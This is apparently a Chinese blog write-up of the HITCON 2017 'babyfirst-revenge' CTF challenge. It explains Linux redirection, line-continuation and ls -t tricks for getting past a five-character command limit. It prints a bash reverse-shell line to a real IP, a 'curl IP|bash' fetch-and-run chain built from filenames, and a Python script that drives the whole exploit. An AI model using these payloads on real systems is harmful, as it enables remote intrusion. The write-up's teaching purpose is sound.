参考：https://blog.csdn.net/calmegm/article/details/80874902 https://www.leavesongs.com/SHARE/some-tricks-from-my-secret-group.html https://blog.csdn.net/calmegm/article/details/80874902

0x01：linux中的 > 符号和 >> 符号

1.通过>来创建文件>test.txt ls

2.通过>将命令执行的结果存入文件中echo "hello world">test

但是通过>来将命令执行结果写入文件会覆盖掉文件原本的内容，如果我们想要在原本文件内容后面追加内容就要使用>>echo "aaa">test cat test echo "bbb">>test cat test

0x02：linux中命令换行

在linux中，当我们执行文件中的命令的时候，我们通过在没有写完的命令后面加 ""，可以将一条命令写在多行

比如我们有一个test文件内容如下：ec ho hello world!

然后我们用sh命令来执行一下：sh test

成功输出了 hello world!

0x03：ls -t命令

在linux中，我们使用ls -t命令后，可以将文件名按照时间顺序排列出来(后创建的排在前面)touch a touch b touch c ls -t

0x04：利用ls -t 和 > 以及换行符 绕过长度限制执行命令

我们先看执行如下命令的结果：ls -t>test cat test

ls -t 命令列出文件名，然后每个文件名按行储存，如果我们将我们要执行的命令拆分为多个文件名，然后再结合命令换行，然后通过 ls -t > test这样的方式再写入某个文件来运行不就可以绕过命令长度限制了吗，而且从上面我们可以看出，ls -t>test的执行顺序是先创建文件test，然后执行ls -t，然后将执行结果写入test文件

我们可以做如下小实验：

比如我们要执行 echo hello world> "rld" > "wo\" > "llo \" > "he\" > "echo \" ls -t > _ sh _

我们可以看到，因为我们最后创建的文件 "_"的文件名会输入到文件中导致一个错误信息，但是并不影响我们下面命令的执行，最终成功的输出了 "hello world"

这里使用了两个 是因为我们需要转义掉多行命令的换行，如果我们只使用一个 那么就会被误解为正在多行执行命令，就会出现下面这种情况echo hello world

0x05：hitcon 2017 babyfirst-revenge

这道ctf题目考的就是绕过长度限制执行命令<?php error_reporting(E_ALL); $sandbox = '/var/www/html/sandbox/'.md5("orange".$_SERVER['REMOTE_ADDR']); mkdir($sandbox); chdir($sandbox); if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) { exec($_GET['cmd']); } else if (isset($_GET['reset'])) { exec('/bin/rm -rf ' . $sandbox); } highlight_file(__FILE__);

既然可以执行命令，那么我们首先想到的是反弹一个shell回来

bash反弹shell的命令如下：bash -i >& /dev/tcp/vps的ip/监听的端口 0>&1

空格需要转义> \

构造空格就用去了五个字符，我们的语句里面有两个空格，而相同的文件名只能有一个，因此这里不能直接执行bash反弹shell

那么通过将反弹语句放在vps上，然后通过如下方式来执行：curl ip地址|bash

我们先在自己的vps新建一个文件，内容为bash -i >& /dev/tcp/120.79.33.253/7777 0>&1

然后在vps上面监听7777端口nc -lv 7777

因为ls -t>_的长度也大于5，所以要要把ls -t>y写入文件

ls命令排序的规则是空格和符号最前，数字其次，字母最后>ls\ ls>_ > \ >-t\ >>y ls>>_

那么我们再构造curl 120.79.33.253|bash>bash >|\ >53\ >2\ >3.\ >3\ >9.\ >7\ >0.\ >12\ > \ >rl\ >cu\

然后运行sh _

生成文件y

再执行sh y

最后贴一下我的py脚本#encoding:utf-8 import requests baseurl = "http://120.79.33.253:9003/?cmd=" reset = "http://120.79.33.253:9003/?reset" s = requests.session() s.get(reset) # 将ls -t 写入文件_ list=[ ">ls\", "ls>_", "> \", ">-t\", ">>y", "ls>>_" ] # curl 120.79.33.253|bash list2=[ ">bash", ">|\", ">53\", ">2\", ">3.\", ">3\", ">9.\", ">7\", ">0.\", ">12\", "> \", ">rl\", ">cu\" ] for i in list: url = baseurl+str(i) s.get(url) for j in list2: url = baseurl+str(j) s.get(url) s.get(baseurl+"sh _") s.get(baseurl+"sh y") #s.get(reset)

成功拿到shell

自搭测试地址：http://120.79.33.253:9003

想要复现一波的大佬可以复现一下，但请不要破坏环境

如有错误，还望各位大佬指出